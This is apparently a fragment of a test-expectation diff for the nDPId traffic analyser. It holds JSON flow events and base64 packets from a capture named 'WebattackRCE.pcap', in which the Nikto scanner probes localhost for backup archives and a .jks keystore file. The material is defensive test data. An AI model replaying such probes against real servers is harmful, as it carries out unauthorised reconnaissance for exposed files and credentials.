{"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":1576420277162,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277162,"pkt":"AAAAAAAAAAAAAAAACABFAAC9DilAAEAGLhB\/AAABfwAAAcPoH5AB6DautSQRQ4AYAED+sQAAAQEICp1m\/NKdZvzRR0VUIC8xLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1576420277164,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277164,"pkt":"AAAAAAAAAAAAAAAACABFAADFIABAAEAGHDF\/AAABfwAAAcPqH5Cuoid2XcqpP4AYAED+uQAAAQEICp1m\/NSdZvzTR0VUIC8xMjcwMC50YXIuYnoyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1576420277165,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277165,"pkt":"AAAAAAAAAAAAAAAACABFAADFxNJAAEAGd15\/AAABfwAAAcPsH5ANevxccArVDoAYAED+uQAAAQEICp1m\/NWdZvzVR0VUIC8xMjcwMC50YXIuYnoyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1576420277166,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277166,"pkt":"AAAAAAAAAAAAAAAACABFAADFbqBAAEAGzZB\/AAABfwAAAcPuH5Bs\/lYWJw4fzoAYAED+uQAAAQEICp1m\/NadZvzWR0VUIC8xMjcuMC4wLjEuamtzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":1,"flow_last_seen":1576420277168,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277168,"pkt":"AAAAAAAAAAAAAAAACABFAADFNC9AAEAGCAJ\/AAABfwAAAcPwH5DG1AyisQj3YYAYAED+uQAAAQEICp1m\/NidZvzYR0VUIC8xMjcuMC4wLjEuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":1,"flow_last_seen":1576420277170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277170,"pkt":"AAAAAAAAAAAAAAAACABFAADDKQdAAEAGEyx\/AAABfwAAAcPyH5DtUBGKsAbmZ4AYAED+twAAAQEICp1m\/NqdZvzZR0VUIC8xMjcuMC4wLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":1,"flow_last_seen":1576420277171,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277171,"pkt":"AAAAAAAAAAAAAAAACABFAADDFtRAAEAGJV9\/AAABfwAAAcP0H5DIKS5flUY6Y4AYAED+twAAAQEICp1m\/NudZvzbR0VUIC8xMjcuMC4wLndhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":1576420277172,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277172,"pkt":"AAAAAAAAAAAAAAAACABFAADBjc9AAEAGrmV\/AAABfwAAAcP2H5CR+bVBDfA+SoAYAED+tQAAAQEICp1m\/NydZvzcR0VUIC8xMjcuMC50Z3ogSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 